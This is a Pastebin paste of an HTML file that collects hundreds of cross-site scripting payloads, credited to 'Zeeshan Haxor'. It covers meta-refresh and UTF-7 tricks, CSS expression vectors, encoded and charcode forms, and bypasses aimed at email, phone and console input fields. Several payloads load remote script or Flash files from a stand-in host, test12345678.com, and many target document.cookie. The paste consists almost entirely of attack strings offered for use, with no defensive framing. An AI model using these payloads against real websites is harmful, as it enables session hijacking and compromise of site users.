API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 8th, 2017
464
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 29.58 KB | None | 0 0
raw download clone embed print report
  1.  
  2. <html lang="en">
  3. <head>
  4.   <meta charset="utf-8">
  5.  
  6.   <title>The HTML5 </title>
  7.   <meta name="description" content="The HTML5 Herald">
  8.   <meta name="author" content="SitePoint">
  9. <META HTTP-EQUIV=”refresh” CONTENT=0;url=javascript:alert(‘CrossSiteScripting’);”>
  10.  
  11. <META HTTP-EQUIV=”refresh” CONTENT=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  12.  
  13. <META HTTP-EQUIV=”refresh” CONTENT=0; URL=http://;URL=javascript:alert(‘CrossSiteScripting’);”>
  14.  
  15. <META HTTP-EQUIV=”refresh” CONTENT=0;url=javascript:alert(‘CrossSiteScripting’);”>
  16.  
  17. <META HTTP-EQUIV=”refresh” CONTENT=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  18.  
  19. <META HTTP-EQUIV=”refresh” CONTENT=0; URL=http://;URL=jAvAsCriPt:aLeRt(‘CroSsSiteScrIpting’);”>
  20.  
  21. <META HTTP-EQUIV=LinkContent=”<http://test12345678.com/CrossSiteScripting.css>; REL=stylesheet”>
  22.  
  23. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘CrossSiteScripting’)</SCRIPT>”>
  24.  
  25. <HEAD><META HTTP-EQUIV=”CONTENT-TYPECONTENT=text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-alert(‘CrossSiteScripting’);+ADw-/SCRIPT+AD4-
  26. +ADw-script+AD4-alert(1)+ADw-/script+AD4-
  27.  
  28. <STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  29.    
  30. -1<meta http-equiv=”refresh” content=0;url=javascript:document.cookie=true;”>
  31.  
  32. -1<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  33.    
  34. </head>
  35.  
  36. <BODY BACKGROUND=”+ADw-script+AD4-alert(1)+ADw-/script+AD4-”>
  37.  
  38.    
  39.    
  40.     New and Advance Xss Vectors And Payloads By Zeeshan Haxor (ZeSn)
  41.  
  42.  
  43. <meta http-equiv=”refresh” content=0;url=javascript:document.cookie=true;”>
  44.  
  45. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  46.  
  47. <SCRIPT>document.cookie=true;</SCRIPT>
  48.  
  49. <IMG SRC=”jav ascript:document.cookie=true;”>
  50.  
  51. <IMG SRC=”javascript:document.cookie=true;”>
  52.  
  53. <IMG SRC=”  javascript:document.cookie=true;”>
  54.  
  55. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  56.  
  57. <SCRIPT>document.cookie=true;//<</SCRIPT>
  58.  
  59. <SCRIPT <B>document.cookie=true;</SCRIPT>
  60.  
  61. <IMG SRC=”javascript:document.cookie=true;”>
  62.  
  63. <iframe src=”javascript:document.cookie=true;>
  64.  
  65. <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  66.  
  67. </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  68.  
  69. <INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  70.  
  71.  
  72.  
  73. <BODY ONLOAD=document.cookie=true;>
  74.  
  75. <IMG DYNSRC=”javascript:document.cookie=true;”>
  76. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  77.  
  78. <IMG LOWSRC=”javascript:document.cookie=true;”>
  79.  
  80. <BGSOUND SRC=”javascript:document.cookie=true;”>
  81.  
  82. <BR SIZE=”&{document.cookie=true}”>
  83.  
  84. <LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  85.  
  86. <LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  87.  
  88.  
  89. ¼script¾document.cookie=true;¼/script¾
  90.  
  91. <IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  92.  
  93. <FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  94.  
  95. <TABLE BACKGROUND=”javascript:document.cookie=true;”>
  96.  
  97. <TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  98.  
  99. <DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  100.  
  101. <DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  102.  
  103. <DIV STYLE=width: expression(document.cookie=true);”>
  104.  
  105. <STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  106.  
  107. <IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  108.  
  109. <CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  110.  
  111. exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  112.  
  113. <STYLE TYPE=text/javascript”>document.cookie=true;</STYLE>
  114.  
  115. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  116.  
  117. <STYLE type=text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  118.  
  119. <SCRIPT>document.cookie=true;</SCRIPT>
  120.  
  121. <BASE HREF=”javascript:document.cookie=true;//”>
  122.  
  123. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  124.  
  125. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  126.  
  127. <XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  128.  
  129.  
  130. <? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  131.  
  132. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  133.  
  134. <a href=”javascript#document.cookie=true;”>
  135.  
  136. <div onmouseover=”document.cookie=true;”>
  137.  
  138. <img src=”javascript:document.cookie=true;”>
  139.  
  140. <img dynsrc=”javascript:document.cookie=true;”>
  141.  
  142. <input type=”image” dynsrc=”javascript:document.cookie=true;”>
  143.  
  144. <bgsound src=”javascript:document.cookie=true;”>
  145.  
  146. &<script>document.cookie=true;</script>
  147.  
  148. &{document.cookie=true;};
  149.  
  150. <img src=&{document.cookie=true;};>
  151.  
  152. <link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  153.  
  154. <img src=”mocha:document.cookie=true;”>
  155.  
  156. <img src=”livescript:document.cookie=true;”>
  157.  
  158. <a href=”about:<script>document.cookie=true;</script>”>
  159.  
  160. <body onload=”document.cookie=true;”>
  161.  
  162. <div style=”background-image: url(javascript:document.cookie=true;);”>
  163.  
  164. <div style=”behaviour: url([link to code]);”>
  165.  
  166. <div style=”binding: url([link to code]);”>
  167.  
  168. <div style=”width: expression(document.cookie=true;);”>
  169.  
  170. <style type=”text/javascript”>document.cookie=true;</style>
  171.  
  172. <object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  173.  
  174. <style><!–</style><script>document.cookie=true;//–></script>
  175.  
  176. <<script>document.cookie=true;</script>
  177.  
  178. <script>document.cookie=true;//–></script>
  179.  
  180. <!– — –><script>document.cookie=true;</script><!– — –>
  181.  
  182. <img src=”blah”onmouseover=”document.cookie=true;”>
  183.  
  184. <img src=”blah>” onmouseover=”document.cookie=true;”>
  185.  
  186. <xml src=”javascript:document.cookie=true;”>
  187.  
  188. <xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  189.  
  190. <div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198. Cross Site Scripting Strings with close TAG:
  199.  
  200.  
  201.  
  202. >”<meta http-equiv=”refresh” content=0;url=javascript:document.cookie=true;”>
  203.  
  204. >”<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  205.  
  206. >”<SCRIPT>document.cookie=true;</SCRIPT>
  207.  
  208. >”<IMG SRC=”jav ascript:document.cookie=true;”>
  209.  
  210. >”<IMG SRC=”javascript:document.cookie=true;”>
  211.  
  212. >”<IMG SRC=”  javascript:document.cookie=true;”>
  213.  
  214. >”<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  215.  
  216. >”<SCRIPT>document.cookie=true;//<</SCRIPT>
  217.  
  218. >”<SCRIPT <B>document.cookie=true;</SCRIPT>
  219.  
  220. >”<IMG SRC=”javascript:document.cookie=true;”>
  221.  
  222. >”<iframe src=”javascript:document.cookie=true;>
  223.  
  224. >”<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  225.  
  226. >”</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  227.  
  228. >”<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  229.  
  230. >”<BODY BACKGROUND=”javascript:document.cookie=true;”>
  231.  
  232. >”<BODY ONLOAD=document.cookie=true;>
  233.  
  234. >”<IMG DYNSRC=”javascript:document.cookie=true;”>
  235.  
  236. >”<IMG LOWSRC=”javascript:document.cookie=true;”>
  237.  
  238. >”<BGSOUND SRC=”javascript:document.cookie=true;”>
  239.  
  240. >”<BR SIZE=”&{document.cookie=true}”>
  241.  
  242. >”<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  243.  
  244. >”<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  245.  
  246. >”<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  247.  
  248. >”¼script¾document.cookie=true;¼/script¾
  249.  
  250. >”<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  251.  
  252. >”<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  253.  
  254. >”<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  255.  
  256. >”<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  257.  
  258. >”<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  259.  
  260. >”<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  261.  
  262. >”<DIV STYLE=width: expression(document.cookie=true);”>
  263.  
  264. >”<STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  265.  
  266. >”<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  267.  
  268. >”<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  269.  
  270. >”exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  271.  
  272. >”<STYLE TYPE=text/javascript”>document.cookie=true;</STYLE>
  273.  
  274. >”<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  275.  
  276. >”<STYLE type=text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  277.  
  278. >”<SCRIPT>document.cookie=true;</SCRIPT>
  279.  
  280. >”<BASE HREF=”javascript:document.cookie=true;//”>
  281.  
  282. >”<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  283.  
  284. >”<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  285.  
  286. >”<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  287.  
  288. >”<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  289.  
  290. >”<? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  291.  
  292. >”<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  293.  
  294. >”<a href=”javascript#document.cookie=true;”>
  295.  
  296. >”<div onmouseover=”document.cookie=true;”>
  297.  
  298. >”<img src=”javascript:document.cookie=true;”>
  299.  
  300. >”<img dynsrc=”javascript:document.cookie=true;”>
  301.  
  302. >”<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  303.  
  304. >”<bgsound src=”javascript:document.cookie=true;”>
  305.  
  306. >”&<script>document.cookie=true;</script>
  307.  
  308. >”&{document.cookie=true;};
  309.  
  310. >”<img src=&{document.cookie=true;};>
  311.  
  312. >”<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  313.  
  314. >”<img src=”mocha:document.cookie=true;”>
  315.  
  316. >”<img src=”livescript:document.cookie=true;”>
  317.  
  318. >”<a href=”about:<script>document.cookie=true;</script>”>
  319.  
  320. >”<body onload=”document.cookie=true;”>
  321.  
  322. >”<div style=”background-image: url(javascript:document.cookie=true;);”>
  323.  
  324. >”<div style=”behaviour: url([link to code]);”>
  325.  
  326. >”<div style=”binding: url([link to code]);”>
  327.  
  328. >”<div style=”width: expression(document.cookie=true;);”>
  329.  
  330. >”<style type=”text/javascript”>document.cookie=true;</style>
  331.  
  332. >”<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  333.  
  334. >”<style><!–</style><script>document.cookie=true;//–></script>
  335.  
  336. >”<<script>document.cookie=true;</script>
  337.  
  338. >”<script>document.cookie=true;//–></script>
  339.  
  340. >”<!– — –><script>document.cookie=true;</script><!– — –>
  341.  
  342. >”<img src=”blah”onmouseover=”document.cookie=true;”>
  343.  
  344. >”<img src=”blah>” onmouseover=”document.cookie=true;”>
  345.  
  346. >”<xml src=”javascript:document.cookie=true;”>
  347.  
  348. >”<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  349.  
  350. >”<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  351.  
  352.  
  353.  
  354.  
  355.  
  356.  
  357.  
  358. Cross Site Scripting Strings with negative value & TAG:
  359. +
  360.  
  361. -1<SCRIPT>document.cookie=true;</SCRIPT>
  362.  
  363. -1<IMG SRC=”jav ascript:document.cookie=true;”>
  364.  
  365. -1<IMG SRC=”javascript:document.cookie=true;”>
  366.  
  367. -1<IMG SRC=”  javascript:document.cookie=true;”>
  368.  
  369. -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  370.  
  371. -1<SCRIPT>document.cookie=true;//<</SCRIPT>
  372.  
  373. -1<SCRIPT <B>document.cookie=true;</SCRIPT>
  374.  
  375. -1<IMG SRC=”javascript:document.cookie=true;”>
  376.  
  377. -1<iframe src=”javascript:document.cookie=true;>
  378.  
  379. -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  380.  
  381. -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  382.  
  383. -1<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  384.  
  385. -1<BODY BACKGROUND=”javascript:document.cookie=true;”>
  386.  
  387. -1<BODY ONLOAD=document.cookie=true;>
  388.  
  389. -1<IMG DYNSRC=”javascript:document.cookie=true;”>
  390.  
  391. -1<IMG LOWSRC=”javascript:document.cookie=true;”>
  392.  
  393. -1<BGSOUND SRC=”javascript:document.cookie=true;”>
  394.  
  395. -1<BR SIZE=”&{document.cookie=true}”>
  396.  
  397. -1<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  398.  
  399. -1<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  400.  
  401. -1<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  402.  
  403. -1¼script¾document.cookie=true;¼/script¾
  404.  
  405. -1<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  406.  
  407. -1<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  408.  
  409. -1<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  410.  
  411. -1<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  412.  
  413. -1<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  414.  
  415. -1<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  416.  
  417. -1<DIV STYLE=width: expression(document.cookie=true);”>
  418.  
  419. -1<STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  420.  
  421. -1<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  422.  
  423. -1<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  424.  
  425. -1exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  426.  
  427. -1<STYLE TYPE=text/javascript”>document.cookie=true;</STYLE>
  428.  
  429. -1<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  430.  
  431. -1<STYLE type=text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  432.  
  433. -1<SCRIPT>document.cookie=true;</SCRIPT>
  434.  
  435. -1<BASE HREF=”javascript:document.cookie=true;//”>
  436.  
  437. -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  438.  
  439. -1<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  440.  
  441. -1<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  442.  
  443. -1<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  444.  
  445. -1<? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  446.  
  447. -1<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  448.  
  449. -1<a href=”javascript#document.cookie=true;”>
  450.  
  451. -1<div onmouseover=”document.cookie=true;”>
  452.  
  453. -1<img src=”javascript:document.cookie=true;”>
  454.  
  455. -1<img dynsrc=”javascript:document.cookie=true;”>
  456.  
  457. -1<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  458.  
  459. -1<bgsound src=”javascript:document.cookie=true;”>
  460.  
  461. -1&<script>document.cookie=true;</script>
  462.  
  463. -1&{document.cookie=true;};
  464.  
  465. -1<img src=&{document.cookie=true;};>
  466.  
  467. -1<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  468.  
  469. -1<img src=”mocha:document.cookie=true;”>
  470.  
  471. -1<img src=”livescript:document.cookie=true;”>
  472.  
  473. -1<a href=”about:<script>document.cookie=true;</script>”>
  474.  
  475. -1<body onload=”document.cookie=true;”>
  476.  
  477. -1<div style=”background-image: url(javascript:document.cookie=true;);”>
  478.  
  479. -1<div style=”behaviour: url([link to code]);”>
  480.  
  481. -1<div style=”binding: url([link to code]);”>
  482.  
  483. -1<div style=”width: expression(document.cookie=true;);”>
  484.  
  485. -1<style type=”text/javascript”>document.cookie=true;</style>
  486.  
  487. -1<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  488.  
  489. -1<style><!–</style><script>document.cookie=true;//–></script>
  490.  
  491. -1<<script>document.cookie=true;</script>
  492.  
  493. -1<script>document.cookie=true;//–></script>
  494.  
  495. -1<!– — –><script>document.cookie=true;</script><!– — –>
  496.  
  497. -1<img src=”blah”onmouseover=”document.cookie=true;”>
  498.  
  499. -1<img src=”blah>” onmouseover=”document.cookie=true;”>
  500.  
  501. -1<xml src=”javascript:document.cookie=true;”>
  502.  
  503. -1<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  504.  
  505. -1<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  506.  
  507.  
  508.  
  509.  
  510.  
  511. Cross Site Scripting Strings Restriction Bypass Mail:
  512.  
  513.  
  514.  
  515. >”<iframe src=http://test12345678.com/>@gmail.com
  516.  
  517. >”<script>alert(document.cookie)</script><div style=1@gmail.com
  518.  
  519. ><script>alert(document.cookie)</script>@gmail.com
  520.  
  521.  
  522.  
  523. <iframe src=http://test12345678.com/>@gmail.com
  524.  
  525. <script>alert(document.cookie)</script><div style=1@gmail.com
  526.  
  527. <script>alert(document.cookie)</script>@gmail.com
  528.  
  529.  
  530.  
  531.  
  532.  
  533. Cross Site Scripting Strings Restriction Bypass Phone:
  534.  
  535. +49/>”<iframe src=http://test12345678.com>1337
  536.  
  537. “><iframe src=onload=alert(‘mphone’)>
  538.  
  539. <iframe src=http://test12345678.com>1337+1
  540.  
  541.  
  542.  
  543.  
  544.  
  545. Cross Site Scripting Strings Restriction Bypass Obfuscation
  546.  
  547.  
  548.  
  549. >“<ScriPt>ALeRt(“VlAb”)</scriPt>
  550.  
  551. >”<IfRaMe sRc=hTtp://test12345678.com></IfRaMe>
  552.  
  553.  
  554.  
  555.  
  556.  
  557. Cross Site Scripting Strings Restriction Bypass String to Charcode
  558.  
  559.  
  560.  
  561. <html><body>
  562.  
  563. <button.onclick=”alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
  564.  
  565. 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
  566.  
  567. 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));”>String:fr
  568.  
  569. om.Char.Code</button></body></html>
  570.  
  571.  
  572.  
  573.  
  574.  
  575. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
  576.  
  577. ”;!–“<CrossSiteScripting>=&{()}
  578.  
  579.  
  580.  
  581.  
  582.  
  583.  
  584.  
  585. Cross Site Scripting Strings Restriction Bypass encoded frame url
  586.  
  587.  
  588.  
  589. %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
  590.  
  591. %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
  592.  
  593. %73%63%72%69%70%74%3E
  594.  
  595.  
  596.  
  597.  
  598.  
  599.  
  600.  
  601. Cross Site Scripting Strings via Console:
  602.  
  603. set vlan name 1337 <script>alert(document.cookie)</script>
  604.  
  605. set system name <iframe src=http://>
  606.  
  607. set system location “><iframe src=a onload=alert(“VL”) <
  608.  
  609. set system contact <script>alert(‘VL’)</script>
  610.  
  611.  
  612.  
  613. insert <script>alert(document.cookie)</script>
  614.  
  615. add <!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://test12345678.com/CrossSiteScripting.js></SCRIPT>'”–>
  616.  
  617. add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
  618.  
  619.  
  620.  
  621. add topic <iframe src=http://test12345678.com>
  622.  
  623. add name <script>alert(‘VL’)</script>
  624.  
  625.  
  626.  
  627. perl -e ‘print “<IMG SRC=java\0script:alert(\”CrossSiteScripting\”)>”;’ > out
  628.  
  629. perl -e ‘print “<SCR\0IPT>alert(\”CrossSiteScripting\”)</SCR\0IPT>”;’ > out
  630.  
  631.  
  632.  
  633. <!–[if gte IE 4]> <SCRIPT>alert(‘CrossSiteScripting’);</SCRIPT> <![endif]–>
  634.  
  635.  
  636.  
  637.  
  638.  
  639.  
  640.  
  641.  
  642.  
  643. Cross Site Scripting Strings on per line validation applications:
  644.  
  645.  
  646.  
  647. <IMG
  648.  
  649. SRC
  650.  
  651. =
  652.  
  654.  
  655. j
  656.  
  657. a
  658.  
  659. v
  660.  
  661. a
  662.  
  663. s
  664.  
  665. c
  666.  
  667. r
  668.  
  669. i
  670.  
  671. p
  672.  
  673. t
  674.  
  675. :
  676.  
  677. a
  678.  
  679. l
  680.  
  681. e
  682.  
  683. r
  684.  
  685. t
  686.  
  687. (
  688.  
  690.  
  691. V
  692.  
  693. L
  694.  
  695. A
  696.  
  697. B
  698.  
  700.  
  701. )
  702.  
  704.  
  705. >
  706.  
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713. Cross Site Scripting Strings Embed:
  714.  
  715.  
  716.  
  717. <EMBED SRC=”http://test12345678.com/CrossSiteScripting.swf” AllowScriptAccess=”always”></EMBED>
  718.  
  719.  
  720.  
  721. <EMBED SRC=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  722.  
  723.  
  724.  
  725. <EMBED SRC=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  726.  
  727.  
  728.  
  729.  
  730.  
  731.  
  732.  
  733. Cross Site Scripting Strings Action Script:
  734.  
  735.  
  736.  
  737. <object type=”application/x-shockwave-flash” data=”http://test12345678.com/hack.swf” width=300height=300″>
  738.  
  739. <param name=”movie” value=”http://test12345678.com/xysecteam.swf” />
  740.  
  741. <param name=”quality” value=”high” />
  742.  
  743. <param name=”scale” value=”noscale” />
  744.  
  745. <param name=”salign” value=”LT” />
  746.  
  747. <param name=”allowScriptAccess” value=”always” />
  748.  
  749. <param name=”menu” value=”false” />
  750.  
  751. </object>
  752.  
  753.  
  754.  
  755.  
  756.  
  757.  
  758.  
  759.  
  760.  
  761. <SCRIPT SRC=http://test12345678.com/CrossSiteScripting.js></SCRIPT>
  762.  
  763. <<SCRIPT>alert(“CrossSiteScripting”);//<</SCRIPT>
  764.  
  765. <SCRIPT SRC=http://test12345678.com/CrossSiteScripting.js?<B>
  766.  
  767. <SCRIPT SRC=//test12345678.com/.js>
  768.  
  769. <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
  770.  
  771. <SCRIPT a=”>” SRC=”http://test12345678.com/CrossSiteScripting.js”></SCRIPT>
  772.  
  773. <SCRIPT a=`>` SRC=”http://test12345678.com/CrossSiteScripting.js”></SCRIPT>
  774.  
  775. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://test12345678.com/CrossSiteScripting.js”></SCRIPT>
  776.  
